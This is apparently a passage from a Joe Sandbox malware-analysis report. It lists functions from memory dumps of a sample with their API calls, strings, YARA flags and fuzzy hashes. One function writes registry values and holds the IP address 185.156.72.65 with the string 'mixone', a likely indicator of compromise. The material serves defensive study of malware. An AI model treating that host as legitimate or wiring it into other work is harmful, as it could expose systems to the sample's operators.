                      • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                      Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                      Function 04955995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04955990,?,?,00000008,?,?,0495C8F1,00000000), ref: 04955BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6a92360c6ed593a8163160f57951f5ff22a9c40d74ee45768f7a554f177bb73f
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 71B11D31610608EFD715CF28C48AB657BE1FF45364F268668E899CF2B6D335E991CB40
                      Function 005E2997 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8_
                      • API String ID: 0-877351122
                      • Opcode ID: 08251fee22e3bb3dee8c6373fdee19eacd1ba4d8ff5c84a9072cdd1aa16082a1
                      • Instruction ID: 80792b2ecf6f4b90055e834753f85fb45e20e246bb3901563a09c7f5398c314b
                      • Opcode Fuzzy Hash: 08251fee22e3bb3dee8c6373fdee19eacd1ba4d8ff5c84a9072cdd1aa16082a1
                      • Instruction Fuzzy Hash: 05D13BF3A086049FE3046E6DEC8577ABBD9EB94360F1A463DE9C4C7744F93598058683
                      Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                      • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                      Function 004739B6 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: NTDL
                      • API String ID: 0-3662016964
                      • Opcode ID: 505011dabb556b50efa4231c028ad2c67dd37abfe8d02df4b47721e18c8b5d34
                      • Instruction ID: a3b22492b67c40a641078b1321d3c227a51c551e6254534620a2b16f73c8a81e
                      • Opcode Fuzzy Hash: 505011dabb556b50efa4231c028ad2c67dd37abfe8d02df4b47721e18c8b5d34
                      • Instruction Fuzzy Hash: 02C1027290821E9FDB11CF64C5015DF7BA4EF4A322F24C12BE84A93A41D27A5E11EF5E
                      Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                      • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                      Function 0494F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction ID: b5095156a5f690e3642485833f0ac53df0a1c405d01f16cdc1e8a54bfb3d9efb
                      • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction Fuzzy Hash: C1C10134A006478FDB28CF68C594E7ABBBAFFC5304F144A39D4529BA98D730B945CB60
                      Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                      • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                      Function 0494EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction ID: fa01a4797d1f63c394b1f7f654db9bb519510f43bc4b30c868f50a83e00bf471
                      • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction Fuzzy Hash: F0B18F71A0060B8BDF24CF68C958EBEBBA9FFC4304F140A79D59297694D731BA41CB61
                      Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 0494A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0494A30B), ref: 0494A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Function 004F4CAF Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 7?
                      • API String ID: 0-896780959
                      • Opcode ID: b487f5806ff1892b7d5e36683f9f46662d93992b97255c20add9fae71a038151
                      • Instruction ID: 2a76e96968a449c5eeebfbf354cd455cfd320f3eb07f54be21604ea17362102f
                      • Opcode Fuzzy Hash: b487f5806ff1892b7d5e36683f9f46662d93992b97255c20add9fae71a038151
                      • Instruction Fuzzy Hash: A5512BF3A081045FF3086E29EC6177AB7E9EFD4320F1A453DEAC6C7780E97958058696
                      Function 005B990D Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 06{k
                      • API String ID: 0-3877807730
                      • Opcode ID: d0416fe68afa5011a417361f16b169d827cbca7ad782e42942dc49a95bd6ab6e
                      • Instruction ID: 5c221ce4a7ee0e3db005778c02378c1ba78fa86d6b5e2b99dce5c50ea151e5aa
                      • Opcode Fuzzy Hash: d0416fe68afa5011a417361f16b169d827cbca7ad782e42942dc49a95bd6ab6e
                      • Instruction Fuzzy Hash: AD5149F3A483005BF3085D6DECC576A77D6EB98330F2A463DEA98D7781E8799C044295
                      Function 0061BF57 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: l
                      • API String ID: 0-2517025534
                      • Opcode ID: a11c5c867736b435dd32831c6686c69acb2212e67d4fd7207d0f44c678823977
                      • Instruction ID: bebdf19ee1d542e1cb15ac08f5236e30aa7fa929d7db2d6100a705795bf6b614
                      • Opcode Fuzzy Hash: a11c5c867736b435dd32831c6686c69acb2212e67d4fd7207d0f44c678823977
                      • Instruction Fuzzy Hash: 43112CB318D295BDF3118A105D11BFF7B59CB83731F38404AF44096583C29A0D499235
                      Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                      • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                      Function 00415E59 Relevance: .6, Instructions: 637COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                      • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                      Function 00477837 Relevance: .2, Instructions: 242COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16c2aee98bd05594f968ea65478791831a3887e4a24402c962bbb9d5fe12e01e
                      • Instruction ID: d626d19abd118888d2fb89f2a4e6a8889a37015e8ddef823b04fe4ef3171cf4d
                      • Opcode Fuzzy Hash: 16c2aee98bd05594f968ea65478791831a3887e4a24402c962bbb9d5fe12e01e
                      • Instruction Fuzzy Hash: 73816BF3F1162447F3644C39CC983A266839BA5325F2F82788E9DAB7C6D87E5C065384
                      Function 005909AA Relevance: .2, Instructions: 215COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98841a0bc8215f9025ca7ddee284c1e8b50921566d93955f1eb25f52f7310989
                      • Instruction ID: 015be23ae8169566d1ac34c575411e3c3fb4db8f86681551922b42eafb30af45
                      • Opcode Fuzzy Hash: 98841a0bc8215f9025ca7ddee284c1e8b50921566d93955f1eb25f52f7310989
                      • Instruction Fuzzy Hash: F5512CF3E182145BF7042A39DC463BABAD6DBD0320F1B463DDA98D7784ED3D99058286
                      Function 00515FB1 Relevance: .2, Instructions: 170COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b3efc5b6a7c2374225cca788a216978b4a9a7d158648fb2fda00111177835328
                      • Instruction ID: 16f68973e1a799fe4ea016ac4b5496697b8aeea3a235635ad3c46184584028be
                      • Opcode Fuzzy Hash: b3efc5b6a7c2374225cca788a216978b4a9a7d158648fb2fda00111177835328
                      • Instruction Fuzzy Hash: 0851D7B3A186109BE314AE2DDC8076AF7E5EF98720F17453DEAD8C3394EA7548018796
                      Function 005C9717 Relevance: .2, Instructions: 154COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc5761e00bb99173c3af84b595a63c3981aaadf61e3f846bf6828a36bf4de641
                      • Instruction ID: 8c1a532e45a1e021206059b7088add1968df8d82200ea9c3d3fb65069f88468e
                      • Opcode Fuzzy Hash: cc5761e00bb99173c3af84b595a63c3981aaadf61e3f846bf6828a36bf4de641
                      • Instruction Fuzzy Hash: 33418FF361C6005FF3086A6CEC8577ABBD5EB98310F1A453DE7D5C3784EA7998008696
                      Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                      Function 0494B937 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: fa6b4651d7221cff094baf480b42453b6c69c455708c8eaf66ed9c9ed1b57600
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: E6112B7720014243DA598AFED4B4EB6F79DEFC5329B2C477AD0858B75AE122F144E600
                      Function 04797D41 Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 8a5cd3a7b95f6d1cedb65045da1f90a52a61a6071a3ad4ec5084ba056dedaf80
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: DC117072350100DFDB58DE55EC90FA673EAEB89620B1D8056E904CB315E675EC01C760
                      Function 04940D90 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 2429803e5c0a4337ea3c502ce323077035bac9e0c6282ea3a7e09db8bb15e051
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6201A276A006149FDF21CF24CC08FAB33F9EFC6216F4544B5EA0A9B281E774B9458B90
                      Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • kernel32.dll, xrefs: 00409C00
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                      Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                      • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                      Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                      Function 0494BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0494C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0494C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0494C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0494C2FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: d19d3c771868f603bdc4c70fa1cf47813a2bd2109d9732880470e4b32eaa9460
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 1CB14571902209EFDF29DFA4C880DAEB7B9BF88314F16416AE8116B211D771FA51CF91
                      Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenSleepValue
                      • String ID: 185.156.72.65$185.156.72.65$mixone
                      • API String ID: 4111408922-485810328
                      • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                      • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                      Function 04949E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04949E22), ref: 04949E50
                      • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04949E22), ref: 04949E5B
